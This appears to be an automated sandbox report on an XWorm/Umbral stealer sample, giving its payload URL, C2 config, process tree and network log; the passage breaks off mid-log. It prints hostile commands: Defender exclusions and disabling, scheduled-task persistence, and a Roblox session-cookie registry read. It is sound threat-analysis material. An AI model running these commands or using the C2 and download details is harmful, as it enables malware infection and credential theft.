Analysis

  • max time kernel
    54s
  • max time network
    55s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/09/2024, 14:59 UTC

General

  • Target

    https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe

Malware Config

Extracted

Family

xworm

Version

5.0

C2

japanese-longer.gl.at.ply.gg:28461

Mutex

MDePCKGcpJNC9Aji

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain
1
pc7TfCwrgO/afVvvjLrS8g==

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to or copying of a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde23f46f8,0x7ffde23f4708,0x7ffde23f4718
      2⤵
        PID:3000
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:2056
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
          2⤵
            PID:3816
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
            2⤵
              PID:1880
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
              2⤵
                PID:3604
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
                2⤵
                  PID:2328
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4236
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                  2⤵
                    PID:2088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                    2⤵
                      PID:4816
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5740 /prefetch:8
                      2⤵
                        PID:4248
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
                        2⤵
                          PID:4416
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                          2⤵
                            PID:4244
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
                            2⤵
                              PID:2532
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5508 /prefetch:8
                              2⤵
                                PID:2704
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3900
                              • C:\Users\Admin\Downloads\xWorm+v5.6.exe
                                "C:\Users\Admin\Downloads\xWorm+v5.6.exe"
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:5176
                                • C:\Users\Admin\AppData\Local\Temp\Cloner.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Cloner.exe"
                                  3⤵
                                  • Checks computer location settings
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5768
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cloner.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2548
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Cloner.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5012
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4020
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5756
                                  • C:\Windows\System32\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2044
                                • C:\Users\Admin\AppData\Local\Temp\Grabb.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Grabb.exe"
                                  3⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5816
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" csproduct get uuid
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5956
                                  • C:\Windows\SYSTEM32\attrib.exe
                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Grabb.exe"
                                    4⤵
                                    • Views/modifies file attributes
                                    PID:6024
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Grabb.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6072
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4712
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1616
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2392
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" os get Caption
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4888
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" computersystem get totalphysicalmemory
                                    4⤵
                                      PID:5864
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      "wmic.exe" csproduct get uuid
                                      4⤵
                                        PID:6064
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4492
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic" path win32_VideoController get name
                                        4⤵
                                        • Detects videocard installed
                                        PID:1076
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Grabb.exe" && pause
                                        4⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        PID:740
                                        • C:\Windows\system32\PING.EXE
                                          ping localhost
                                          5⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:5404
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:5016
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:3920
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /4
                                      1⤵
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5628

                                    Network

                                    • flag-us
                                      DNS
                                      8.8.8.8.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      Response
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      dnsgoogle
                                    • flag-us
                                      DNS
                                      217.106.137.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      217.106.137.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      github.com
                                      msedge.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      github.com
                                      IN A
                                      Response
                                      github.com
                                      IN A
                                      20.26.156.215
                                    • flag-gb
                                      GET
                                      https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
                                      msedge.exe
                                      Remote address:
                                      20.26.156.215:443
                                      Request
                                      GET /3z02/Dont-/raw/main/xWorm+v5.6.exe HTTP/2.0
                                      host: github.com
                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                      sec-ch-ua-mobile: ?0
                                      dnt: 1
                                      upgrade-insecure-requests: 1
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      sec-fetch-site: none
                                      sec-fetch-mode: navigate
                                      sec-fetch-user: ?1
                                      sec-fetch-dest: document
                                      accept-encoding: gzip, deflate, br
                                      accept-language: en-US,en;q=0.9
                                      Response
                                      HTTP/2.0 302
                                      server: GitHub.com
                                      date: Fri, 06 Sep 2024 15:00:51 GMT
                                      content-type: text/html; charset=utf-8
                                      vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      access-control-allow-origin:
                                      location: https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      cache-control: no-cache
                                      strict-transport-security: max-age=31536000; includeSubdomains; preload
                                      x-frame-options: deny
                                      x-content-type-options: nosniff
                                      x-xss-protection: 0
                                      referrer-policy: no-referrer-when-downgrade
                                      content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                      content-length: 0
                                      x-github-request-id: EA40:14F9E:3D003DB:4486729:66DB1922
                                    • flag-us
                                      DNS
                                      raw.githubusercontent.com
                                      msedge.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      raw.githubusercontent.com
                                      IN A
                                      Response
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.109.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.110.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.111.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.108.133
                                    • [US]
                                      GET
                                      https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      msedge.exe
                                      Remote address:
                                      185.199.109.133:443
                                      Request
                                      GET /3z02/Dont-/main/xWorm%2Bv5.6.exe HTTP/2.0
                                      host: raw.githubusercontent.com
                                      dnt: 1
                                      upgrade-insecure-requests: 1
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      sec-fetch-site: none
                                      sec-fetch-mode: navigate
                                      sec-fetch-user: ?1
                                      sec-fetch-dest: document
                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                      sec-ch-ua-mobile: ?0
                                      accept-encoding: gzip, deflate, br
                                      accept-language: en-US,en;q=0.9
                                      Response
                                      HTTP/2.0 200
                                      cache-control: max-age=300
                                      content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      content-type: application/octet-stream
                                      etag: W/"1a1d58d7f4eff9bd744ec6bebab368924489e2f368988c1bea88ae9393dda613"
                                      strict-transport-security: max-age=31536000
                                      x-content-type-options: nosniff
                                      x-frame-options: deny
                                      x-xss-protection: 1; mode=block
                                      x-github-request-id: 5B07:143B1A:8299F3:9FB431:66DB1921
                                      accept-ranges: bytes
                                      date: Fri, 06 Sep 2024 15:00:51 GMT
                                      via: 1.1 varnish
                                      x-served-by: cache-lon420145-LON
                                      x-cache: MISS
                                      x-cache-hits: 0
                                      x-timer: S1725634851.443823,VS0,VE518
                                      vary: Authorization,Accept-Encoding,Origin
                                      access-control-allow-origin: *
                                      cross-origin-resource-policy: cross-origin
                                      x-fastly-request-id: ab67e362a719ac283748f88d07019c775d849050
                                      expires: Fri, 06 Sep 2024 15:05:51 GMT
                                      source-age: 0
                                      content-length: 12582912
                                    • [US]
                                      DNS
                                      215.156.26.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      215.156.26.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      34.56.20.217.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      34.56.20.217.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      95.221.229.192.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      95.221.229.192.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      22.160.190.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      22.160.190.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      133.109.199.185.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      133.109.199.185.in-addr.arpa
                                      IN PTR
                                      Response
                                      133.109.199.185.in-addr.arpa
                                      IN PTR
                                      cdn-185-199-109-133.github.com
                                    • [US]
                                      DNS
                                      241.150.49.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      241.150.49.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      gstatic.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      gstatic.com
                                      IN A
                                      Response
                                      gstatic.com
                                      IN A
                                      142.250.102.94
                                      gstatic.com
                                      IN A
                                      142.250.102.120
                                    • [NL]
                                      GET
                                      https://gstatic.com/generate_204
                                      Grabb.exe
                                      Remote address:
                                      142.250.102.94:443
                                      Request
                                      GET /generate_204 HTTP/1.1
                                      Host: gstatic.com
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 204 No Content
                                      Content-Length: 0
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Date: Fri, 06 Sep 2024 15:01:08 GMT
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    • [US]
                                      DNS
                                      ip-api.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      ip-api.com
                                      IN A
                                      Response
                                      ip-api.com
                                      IN A
                                      208.95.112.1
                                    • [US]
                                      GET
                                      http://ip-api.com/line/?fields=hosting
                                      Grabb.exe
                                      Remote address:
                                      208.95.112.1:80
                                      Request
                                      GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 15:01:07 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                    • [US]
                                      DNS
                                      94.102.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      94.102.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      94.102.250.142.in-addr.arpa
                                      IN PTR
                                      rb-in-f94.1e100.net
                                    • [US]
                                      DNS
                                      1.112.95.208.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      1.112.95.208.in-addr.arpa
                                      IN PTR
                                      Response
                                      1.112.95.208.in-addr.arpa
                                      IN PTR
                                      ip-api.com
                                    • [US]
                                      GET
                                      http://ip-api.com/json/?fields=225545
                                      Grabb.exe
                                      Remote address:
                                      208.95.112.1:80
                                      Request
                                      GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 15:01:11 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 161
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                    • [US]
                                      DNS
                                      canary.discord.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      canary.discord.com
                                      IN A
                                      Response
                                      canary.discord.com
                                      IN A
                                      162.159.137.232
                                      canary.discord.com
                                      IN A
                                      162.159.135.232
                                      canary.discord.com
                                      IN A
                                      162.159.128.233
                                      canary.discord.com
